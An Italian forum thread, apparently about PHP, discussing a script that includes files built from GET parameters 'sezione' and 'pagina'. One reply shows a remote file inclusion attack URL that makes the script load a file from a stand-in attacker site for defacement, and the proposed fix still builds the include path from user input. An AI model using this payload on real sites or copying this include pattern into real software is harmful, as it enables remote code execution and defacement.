[supersaibal]Originariamente inviato da skidx
Codice PHP:
$pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php'
A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.

Quindi con
http://www.sitobastardo.com/inc_defacciamitutto.php

basta chiamare
tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com

Almeno così mi sembra, se non mi sto rincoglionendo del tutto

Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito. [/supersaibal]
'inchia e chi se ne era accorto? azz

così?

Codice PHP:
<?php
include 'su.php';
include 
'sx.php';
$pagina 'centro.php';
if (isset(
$_GET['pagina']) && isset($_GET['sezione']))
{
    
$pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php';
}
if (!
file_exists ($pagina))
{
        
$pagina 'errore.php';
}
$pagina "http://nomesito/" $pagina;
include 
$pagina;
include 
'giu.php';
?>